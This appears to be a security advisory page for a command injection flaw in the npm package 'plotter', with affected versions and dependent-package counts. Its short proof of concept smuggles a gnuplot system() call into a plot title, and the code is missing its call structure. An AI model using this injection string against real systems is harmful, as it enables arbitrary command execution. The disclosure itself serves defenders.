An open API service providing security vulnerability metadata for many open source software ecosystems.

Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTY1eHgtYzg1eC13Zzc2

Command Injection in plotter

All versions of plotter are vulnerable to Command Injection. The package fails to sanitize plot titles, which may allow attackers to execute arbitrary code in the system if the title value is supplied by a user. The following proof-of-concept creates a testing file in the current directory:

var plot = require('plotter').plot;

const title = 'Example "\nset title system("touch testing")#';

data: [ 3, 1, 2, 3, 4 ],
filename: 'output.pdf',
style: 'linespoints',
title: title,
logscale: true,
xlabel: 'time',
ylabel: 'length of string',
format: 'pdf'


No fix is currently available. Consider using an alternative package until a fix is made available.

Source: GitHub Advisory Database
Origin: Unspecified
Severity: Critical
Classification: General
Published: over 3 years ago
Updated: over 1 year ago

Identifiers: GHSA-65xx-c85x-wg76
References: Blast Radius: 0.0

Affected Packages

Dependent packages: 12
Dependent repositories: 23
Downloads: 276 last month
Affected Version Ranges: >= 0.0.0
No known fixed version
All affected versions: 0.1.3, 0.1.4, 0.1.5, 0.2.0, 0.2.1, 0.2.2, 0.3.0, 0.4.0, 0.4.1, 0.4.2, 0.4.3, 0.5.0